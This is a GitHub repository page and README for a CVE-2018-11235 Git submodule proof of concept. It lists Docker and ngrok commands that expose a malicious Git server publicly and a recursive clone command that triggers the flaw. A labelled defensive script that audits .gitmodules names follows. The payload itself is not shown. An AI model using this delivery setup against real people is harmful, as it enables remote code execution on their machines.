https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
- Host: GitHub
- URL: https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
- Owner: twseptian
- Created: 2022-03-02T16:26:52.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-03-02T16:39:06.000Z (over 3 years ago)
- Last Synced: 2024-12-26T03:43:19.826Z (10 months ago)
- Language: Dockerfile
- Size: 4.88 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
CVE-2018-11235-Git PoC and tunneling with docker ngrok

### Build Dockerfile
```bash
$ docker build -t cve-2018-11235 .
```

### Create custom network for `ngrok`
```bash
$ docker network create myngroknet
```

### Start Git Http Server
```bash
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235
```

### Start Ngrok HTTP Server for Git Server
```bash
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN
```

### You can now access the API to find the assigned domain:
```bash
$ curl $(docker port ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}
```

### PoC on Vulnerable Git Server
```bash
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
```

### References:
- [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
- [CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [Expose Docker Container services on the Internet using the ngrok docker image](https://medium.com/oracledevs/expose-docker-container-services-on-the-internet-using-the-ngrok-docker-image-3f1ea0f9c47a)
- [wernight/ngrok](https://hub.docker.com/r/wernight/ngrok/)
- [CVE-2018-11235 - Quick & Dirty PoC](https://atorralba.github.io/CVE-2018-11235/)
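
A defensive counterpart to the recursive clone step: a repository's `.gitmodules` can be audited before any submodule is initialised. The script below is an added example, not part of this repository; it applies the rule that patched Git versions enforce for CVE-2018-11235 (a submodule name may not be empty or contain a `..` path component). The function names and the sample file are constructed for illustration, and as a simplifying assumption only the quoted `[submodule "name"]` header form is read.

```bash
#!/bin/sh
# Added example (not from the repository): reject .gitmodules files whose
# submodule names are empty or contain a ".." path component.

# Print the name from each [submodule "name"] header, undoing \" and \\ escapes.
list_submodule_names() {
    awk 'tolower($0) ~ /^[ \t]*\[submodule[ \t]+"/ {
        s = $0; sub(/^[^"]*"/, "", s); name = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == "\\") { i++; name = name substr(s, i, 1); continue }
            if (c == "\"") break
            name = name c
        }
        print name
    }' "$1"
}

# Succeed only for a non-empty name with no ".." component; "\" counts as a
# separator too, so the verdict does not depend on the platform.
submodule_name_ok() {
    [ -n "$1" ] || return 1
    padded="/$(printf '%s' "$1" | tr '\\' '/')/"
    case "$padded" in */../*) return 1 ;; esac
    return 0
}

# Report every rejected name on stderr; exit status 0 means the file is clean.
audit_gitmodules() {
    list_submodule_names "$1" | {
        bad=0
        while IFS= read -r name; do
            submodule_name_ok "$name" && continue
            printf 'rejected submodule name: "%s"\n' "$name" >&2
            bad=$((bad + 1))
        done
        [ "$bad" -eq 0 ]
    }
}

# Constructed sample input: one ordinary entry and one traversing name.
sample=$(mktemp)
cat > "$sample" <<'EOF'
[submodule "libs/zlib"]
	path = libs/zlib
[SubModule "deps/../../outside"]
	path = outside
EOF
audit_gitmodules "$sample" || echo "do not clone recursively: $sample"
rm -f "$sample"
```
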